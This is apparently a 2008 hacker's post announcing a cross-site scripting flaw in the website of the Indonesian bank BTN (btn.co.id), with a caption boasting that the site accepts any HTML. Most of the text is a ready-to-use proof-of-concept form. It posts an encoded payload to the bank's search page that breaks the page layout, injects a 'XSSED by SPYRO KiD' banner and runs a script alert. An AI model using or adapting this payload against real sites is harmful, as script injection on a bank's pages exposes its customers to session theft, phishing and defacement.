Bank BTN Vulnerable to XSS


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Monday, July 21st, 2008
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


 

{image: btn.co.id XSSED by SPYRO KiD}

btn.co.id XSSED by SPYRO KiD

{image: btn.co.id Menerima Semua Tag HTML}

btn.co.id Menerima Semua Tag HTML

POC:

<form name="srchBTNCare" method="post" action="http://www.btn.co.id/btn_care_cat.asp">
<input type="hidden" name="srchField" size="20" value="&quot;&gt;&lt;/form&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;center&gt;&lt;br&gt;&lt;h1&gt;XSSED&lt;br&gt;&lt;br&gt;by&lt;br&gt;&lt;br&gt;SPYRO KiD&lt;br&gt;http://spyrozone.net&lt;/h1&gt;&lt;br&gt;&lt;br&gt;&lt;script&gt;alert(&quot;XSSED by SPYRO KiD\nhttp://spyrozone.net || admin@spyrozone.net&quot;);&lt;/script&gt;&lt;noscript&gt;">
<input name="submit" type="image" border="0" src="clickhere.gif" alt="Click Here" onClick="srchBTNCare.submit();">
<input type="hidden" name="srchParam" value="question">
<input type="hidden" name="srchDo" value="1">
</form>


//E.O.F